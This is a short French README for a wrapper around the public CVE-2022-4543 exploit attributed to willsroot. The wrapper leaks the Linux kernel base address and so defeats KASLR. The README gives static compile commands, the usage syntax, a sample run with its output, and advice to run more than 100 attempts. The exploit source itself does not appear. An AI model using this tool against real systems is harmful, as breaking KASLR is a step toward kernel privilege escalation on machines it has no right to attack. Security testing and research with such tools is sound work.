
Ceci est un wrapper de l'exploit CVE-2022-4543 de willsroot pour vous aider à évaluer et obtenir l'adresse de base du noyau.
Selon vos besoins (facultatif) :
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Pour certains OS, installez d'abord la libc statique.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
Après avoir exécuté les deux programmes, il vous donnera l'adresse la plus fréquente en fonction de votre offset.
En pratique, la véritable adresse de base du noyau apparaîtra dans plus d'1/4 de l'ensemble des tentatives. Il est recommandé de faire plus de 100 tentatives.